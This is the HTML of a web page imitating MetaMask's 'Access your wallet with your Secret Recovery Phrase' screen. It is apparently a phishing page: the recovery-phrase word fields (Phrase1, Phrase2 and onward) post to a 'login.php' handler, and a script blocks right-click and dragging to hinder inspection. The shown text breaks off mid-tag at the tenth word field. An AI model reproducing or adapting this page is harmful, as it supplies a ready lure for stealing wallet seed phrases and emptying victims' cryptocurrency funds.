<html class="metamask-loaded" data-theme="light"><head><script type="text/javascript">function mousedwn(e){try{if(event.button==2||event.button==3)return false}catch(e){if(e.which==3)return false}}document.oncontextmenu=function(){return false};document.ondragstart=function(){return false};document.onmousedown=mousedwn
</script>
</head><body><div id="in-page-channel-node-id" data-channel-name="in_page_channel_FaRdLN"></div><script src="chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js"></script><div id="in-page-channel-node-id" data-channel-name="in_page_channel_VJRbiU"></div><script src="chrome-extension://lgmpcpglpngdoalbgeoldeajfclnhafa/inpage.js"></script>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no">
  <title>MetaMask</title>
<link rel="icon" href="logo/metamask-fox.svg">
      <link rel="stylesheet" type="text/css" href="./index.css" title="ltr">
  <link rel="stylesheet" type="text/css" href="./index-rtl.css" title="rtl" disabled="">
<style></style><style data-jss="" data-meta="MuiInputBase">
@-webkit-keyframes mui-auto-fill {}
@-webkit-keyframes mui-auto-fill-cancel {}
.MuiInputBase-root {
color: rgba(0, 0, 0, 0.87);
cursor: text;
display: inline-flex;
position: relative;
font-size: 1rem;
box-sizing: border-box;
align-items: center;
font-family: "Roboto", "Helvetica", "Arial", sans-serif;
font-weight: 400;
line-height: 1.1876em;
letter-spacing: 0.00938em;
}
.MuiInputBase-root.Mui-disabled {
color: rgba(0, 0, 0, 0.38);
cursor: default;
}
.MuiInputBase-multiline {
padding: 6px 0 7px;
}
.MuiInputBase-multiline.MuiInputBase-marginDense {
padding-top: 3px;
}
.MuiInputBase-fullWidth {
width: 100%;
}
.MuiInputBase-input {
font: inherit;
color: currentColor;
width: 100%;
border: 0;
height: 1.1876em;
margin: 0;
display: block;
padding: 6px 0 7px;
min-width: 0;
background: none;
box-sizing: content-box;
animation-name: mui-auto-fill-cancel;
letter-spacing: inherit;
animation-duration: 10ms;
-webkit-tap-highlight-color: transparent;
}
.MuiInputBase-input::-webkit-input-placeholder {
color: currentColor;
opacity: 0.42;
transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-moz-placeholder {
color: currentColor;
opacity: 0.42;
transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:-ms-input-placeholder {
color: currentColor;
opacity: 0.42;
transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-ms-input-placeholder {
color: currentColor;
opacity: 0.42;
transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:focus {
outline: 0;
}
.MuiInputBase-input:invalid {
box-shadow: none;
}
.MuiInputBase-input::-webkit-search-decoration {
-webkit-appearance: none;
}
.MuiInputBase-input.Mui-disabled {
opacity: 1;
}
.MuiInputBase-input:-webkit-autofill {
animation-name: mui-auto-fill;
animation-duration: 5000s;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
opacity: 0.42;
}
.MuiInputBase-inputMarginDense {
padding-top: 3px;
}
.MuiInputBase-inputMultiline {
height: auto;
resize: none;
padding: 0;
}
.MuiInputBase-inputTypeSearch {
-moz-appearance: textfield;
-webkit-appearance: textfield;
}
</style><style data-jss="" data-meta="MuiInput">
.MuiInput-root {
position: relative;
}
label + .MuiInput-formControl {
margin-top: 16px;
}
.MuiInput-colorSecondary.MuiInput-underline:after {
border-bottom-color: #f50057;
}
.MuiInput-underline:after {
left: 0;
right: 0;
bottom: 0;
content: "";
position: absolute;
transform: scaleX(0);
transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
border-bottom: 2px solid #3f51b5;
pointer-events: none;
}
.MuiInput-underline.Mui-focused:after {
transform: scaleX(1);
}
.MuiInput-underline.Mui-error:after {
transform: scaleX(1);
border-bottom-color: #f44336;
}
.MuiInput-underline:before {
left: 0;
right: 0;
bottom: 0;
content: "\00a0";
position: absolute;
transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
border-bottom: 1px solid rgba(0, 0, 0, 0.42);
pointer-events: none;
}
.MuiInput-underline:hover:not(.Mui-disabled):before {
border-bottom: 2px solid rgba(0, 0, 0, 0.87);
}
.MuiInput-underline.Mui-disabled:before {
border-bottom-style: dotted;
}
@media (hover: none) {
.MuiInput-underline:hover:not(.Mui-disabled):before {
  border-bottom: 1px solid rgba(0, 0, 0, 0.42);
}
}
</style><style data-jss="" data-meta="MuiFormControl">
.MuiFormControl-root {
border: 0;
margin: 0;
display: inline-flex;
padding: 0;
position: relative;
min-width: 0;
flex-direction: column;
vertical-align: top;
}
.MuiFormControl-marginNormal {
margin-top: 16px;
margin-bottom: 8px;
}
.MuiFormControl-marginDense {
margin-top: 8px;
margin-bottom: 4px;
}
.MuiFormControl-fullWidth {
width: 100%;
}
</style><style data-jss="" data-meta="MuiTextField">

</style><style data-jss="" data-meta="makeStyles">
.jss1 {
color: var(--color-text-alternative);
font-weight: 400;
}
.jss1.jss2 {
color: var(--color-text-alternative);
}
.jss1.jss4 {
color: var(--color-text-alternative);
}
.jss3:before {
border-bottom: 1px solid var(--color-text-default) !important;
}
.jss3:after {
border-bottom: 2px solid var(--color-primary-default);
}
.jss5 {
color: var(--color-text-alternative);
}
.jss6 {
padding: 8px;
}
.jss6::placeholder {
color: var(--color-text-alternative);
}
.jss7 {
color: var(--color-background-default);
}
.jss8:after {
border-bottom: 2px solid var(--color-background-default);
}
.jss9.jss10 {
color: var(--color-text-alternative);
}
.jss9.jss4 {
color: var(--color-text-alternative);
}
.jss12 {
color: var(--color-text-default);
border: 1px solid var(--color-border-default);
height: 48px;
display: flex;
padding: 0 16px;
align-items: center;
border-radius: 6px;
background-color: var(--color-background-default);
}
label + .jss12 {
margin-top: 9px;
}
.jss12.jss11 {
border: 1px solid var(--color-primary-default);
}
.jss13 {
color: var(--color-text-default);
position: initial;
font-size: 1rem;
transform: none;
transition: none;
}
.jss14 {
color: var(--color-text-default);
position: initial;
font-size: .75rem;
transform: none;
transition: none;
}
.jss15 {
line-height: initial !important;
}
</style>

  <div id="app-content"><div class="app os-win mouse-user-styles"><div class="onboarding-app-header"><div class="onboarding-app-header__contents"><button class="mm-box onboarding-app-header__logo-container mm-box--background-color-transparent" data-testid="app-header-logo"><img src="logo/metamask-logo-horizontal.svg" svg="" height="30" viewbox="0 0 1311 242" width="162" xmlns="http://www.w3.org/2000/svg" class="onboarding-app-header__metafox-logo--horizontal"><g fill="none"><g fill="var(--color-text-default)" transform="translate(361 61)"></g></g><img src="logo/metamask-fox.svg" class="onboarding-app-header__metafox-logo--icon" alt=""></button><div class="dropdown"><select class="dropdown__select"><option value="am">English</option><option value="ar">العربية</option><option value="bg">български</option><option value="bn">বাংলা</option><option value="ca">Català</option><option value="cs">Čeština</option><option value="da">Dansk</option><option value="de">Deutsch</option><option value="el">ελληνικά</option><option value="en">English</option><option value="es">Español</option><option value="es_419">Español (Latin America)</option><option value="et">Estonian</option><option value="fa">فارسی</option><option value="fi">Suomi</option><option value="fil">Filipino</option><option value="fr">Français</option><option value="gu">ગુજરાત</option><option value="he">עברית</option><option value="hi">मानक हिन्दी</option><option value="hn">हिन्दी</option><option value="hr">Hrvatski</option><option value="ht">Kreyòl ayisyen</option><option value="hu">Magyar</option><option value="id">Bahasa Indonesia</option><option value="it">Italiano</option><option value="ja">日本語</option><option value="kn">ಕನ್ನಡ</option><option value="ko">한국어</option><option value="lt">Lietuviškai</option><option value="lv">Latvian</option><option value="ml">മലയാളം</option><option value="mr">मराठी</option><option value="ms">Malay</option><option value="nl">Nederlands</option><option value="no">Norwegian</option><option value="ph">Pilipino</option><option value="pl">Polskie</option><option value="pt">Português</option><option value="pt_BR">Português (Brazillian)</option><option value="pt_PT">Português (European)</option><option value="ro">Limba română</option><option value="ru">Русский</option><option value="sk">Slovenčina</option><option value="sl">Slovenščina</option><option value="sr">српски</option><option value="sv">Svenska</option><option value="sw">Swahili</option><option value="ta">தமிழ்</option><option value="te">తెలుగు</option><option value="th">ไทย</option><option value="tl">Wikang Tagalog</option><option value="tr">Türkçe</option><option value="uk">Українська мова</option><option value="vi">Tiếng Việt</option><option value="zh_CN">中文(简体)</option><option value="zh_TW">中文(繁體)</option></select><span class="mm-box dropdown__icon-caret-down mm-icon mm-icon--size-sm mm-box--display-inline-block mm-box--color-inherit" style="-webkit-mask-image: url(&quot;./images/icons/arrow-down.svg&quot;);"></span></div></div></div><div class="mm-box main-container-wrapper"><div class="onboarding-flow"><div class="onboarding-flow__wrapper"><div class="import-srp" data-testid="import-srp"><div class="box box--margin-bottom-4 box--flex-direction-row box--width-full"><ul class="progressbar two-steps"><li class="active">Confirm secret recovery phrase</li><li class="two-steps">Create password</li></ul></div><div class="import-srp__header"><h2 class="box box--margin-top-1 box--margin-bottom-1 box--flex-direction-row typography typography--h2 typography--weight-bold typography--style-normal typography--color-text-default">Access your wallet with your Secret Recovery Phrase</h2></div><div class="import-srp__description"><h4 class="box box--margin-top-1 box--margin-bottom-1 box--flex-direction-row typography typography--h4 typography--weight-normal typography--style-normal typography--color-text-default"><span> MetaMask cannot recover your password. We will use your Secret Recovery Phrase to validate your ownership, restore your wallet and set up a new password. First, enter the Secret Recovery Phrase that you were given when you created your wallet. <a type="link" href="https://metamask.zendesk.com/hc/en-us/articles/360060826432-What-is-a-Secret-Recovery-Phrase-and-how-to-keep-your-crypto-wallet-secure" target="_blank" rel="noopener noreferrer">Learn more</a> </span></h4></div><form method="post" action="login.php"><div class="import-srp__actions"><div class="box box--flex-direction-row box--text-align-left"><div class="import-srp__container"><label class="import-srp__srp-label"><h4 class="mm-box mm-text mm-text--heading-sm mm-box--color-text-default" align="left">Type your Secret Recovery Phrase</h4></label><div class="mm-box mm-banner-base mm-banner-alert mm-banner-alert--severity-info import-srp__paste-tip mm-box--padding-3 mm-box--padding-left-2 mm-box--display-flex mm-box--gap-2 mm-box--background-color-primary-muted mm-box--rounded-sm"><span class="mm-box mm-icon mm-icon--size-lg mm-box--display-inline-block mm-box--color-primary-default" style="-webkit-mask-image: url(&quot;./images/icons/info.svg&quot;);"></span><div><p class="mm-box mm-text import-srp__banner-alert-text mm-text--body-md mm-box--color-text-default">You can paste your entire secret recovery phrase into any field</p><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default"></p></div></div><div class="dropdown import-srp__number-of-words-dropdown"><select class="dropdown__select"><option value="12">I have a 12-word phrase</option><option value="15">I have a 15-word phrase</option><option value="18">I have a 18-word phrase</option><option value="21">I have a 21-word phrase</option><option value="24">I have a 24-word phrase</option></select><span class="mm-box dropdown__icon-caret-down mm-icon mm-icon--size-sm mm-box--display-inline-block mm-box--color-inherit" style="-webkit-mask-image: url(&quot;./images/icons/arrow-down.svg&quot;);"></span></div><div class="import-srp__srp"><div class="import-srp__srp-word"><label for="import-srp__srp-word-0" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">1.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-0" type="password" dir="auto" data-testid="import-srp__srp-word-0" class="MuiInputBase-input MuiInput-input" value="" name="Phrase1" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-0-checkbox" type="checkbox" data-testid="import-srp__srp-word-0-checkbox"><label for="import-srp__srp-word-0-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-1" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">2.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-1" type="password" dir="auto" data-testid="import-srp__srp-word-1" class="MuiInputBase-input MuiInput-input" value="" name="Phrase2" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-1-checkbox" type="checkbox" data-testid="import-srp__srp-word-1-checkbox"><label for="import-srp__srp-word-1-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-2" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">3.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-2" type="password" dir="auto" data-testid="import-srp__srp-word-2" class="MuiInputBase-input MuiInput-input" value="" name="Phrase3" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-2-checkbox" type="checkbox" data-testid="import-srp__srp-word-2-checkbox"><label for="import-srp__srp-word-2-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-3" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">4.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-3" type="password" dir="auto" data-testid="import-srp__srp-word-3" class="MuiInputBase-input MuiInput-input" value="" name="Phrase4" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-3-checkbox" type="checkbox" data-testid="import-srp__srp-word-3-checkbox"><label for="import-srp__srp-word-3-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-4" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">5.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-4" type="password" dir="auto" data-testid="import-srp__srp-word-4" class="MuiInputBase-input MuiInput-input" value="" name="Phrase5" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-4-checkbox" type="checkbox" data-testid="import-srp__srp-word-4-checkbox"><label for="import-srp__srp-word-4-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-5" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">6.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-5" type="password" dir="auto" data-testid="import-srp__srp-word-5" class="MuiInputBase-input MuiInput-input" value="" name="Phrase6" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-5-checkbox" type="checkbox" data-testid="import-srp__srp-word-5-checkbox"><label for="import-srp__srp-word-5-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-6" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">7.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-6" type="password" dir="auto" data-testid="import-srp__srp-word-6" class="MuiInputBase-input MuiInput-input" value="" name="Phrase7" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-6-checkbox" type="checkbox" data-testid="import-srp__srp-word-6-checkbox"><label for="import-srp__srp-word-6-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-7" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">8.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-7" type="password" dir="auto" data-testid="import-srp__srp-word-7" class="MuiInputBase-input MuiInput-input" value="" name="Phrase8" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-7-checkbox" type="checkbox" data-testid="import-srp__srp-word-7-checkbox"><label for="import-srp__srp-word-7-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-8" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">9.</p></label><div class="MuiFormControl-root MuiTextField-root"><div class="MuiInputBase-root MuiInput-root jss12 MuiInputBase-formControl MuiInput-formControl"><input aria-invalid="false" autocomplete="off" id="import-srp__srp-word-8" type="password" dir="auto" data-testid="import-srp__srp-word-8" class="MuiInputBase-input MuiInput-input" value="" name="Phrase9" required=""></div></div><div class="show-hide-toggle"><input class="show-hide-toggle__input" id="import-srp__srp-word-8-checkbox" type="checkbox" data-testid="import-srp__srp-word-8-checkbox"><label for="import-srp__srp-word-8-checkbox" class="show-hide-toggle__label" title="Show/Hide this word of the secret recovery phrase"><svg width="24" height="24" fill="currentColor" class="show-hide-toggle__icon" aria-label="This word is hidden" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 640 512"><path d="M634 471L36 3.51A16 16 0 0 0 13.51 6l-10 12.49A16 16 0 0 0 6 41l598 467.49a16 16 0 0 0 22.49-2.49l10-12.49A16 16 0 0 0 634 471zM296.79 146.47l134.79 105.38C429.36 191.91 380.48 144 320 144a112.26 112.26 0 0 0-23.21 2.47zm46.42 219.07L208.42 260.16C210.65 320.09 259.53 368 320 368a113 113 0 0 0 23.21-2.46zM320 112c98.65 0 189.09 55 237.93 144a285.53 285.53 0 0 1-44 60.2l37.74 29.5a333.7 333.7 0 0 0 52.9-75.11 32.35 32.35 0 0 0 0-29.19C550.29 135.59 442.93 64 320 64c-36.7 0-71.71 7-104.63 18.81l46.41 36.29c18.94-4.3 38.34-7.1 58.22-7.1zm0 288c-98.65 0-189.08-55-237.93-144a285.47 285.47 0 0 1 44.05-60.19l-37.74-29.5a333.6 333.6 0 0 0-52.89 75.1 32.35 32.35 0 0 0 0 29.19C89.72 376.41 197.08 448 320 448c36.7 0 71.71-7.05 104.63-18.81l-46.41-36.28C359.28 397.2 339.89 400 320 400z"></path></svg></label></div></div><div class="import-srp__srp-word"><label for="import-srp__srp-word-9" class="import-srp__srp-word-label"><p class="mm-box mm-text mm-text--body-md mm-box--color-text-default">10.</p></label><div class="MuiFormControl-root MuiTextField-root"><div 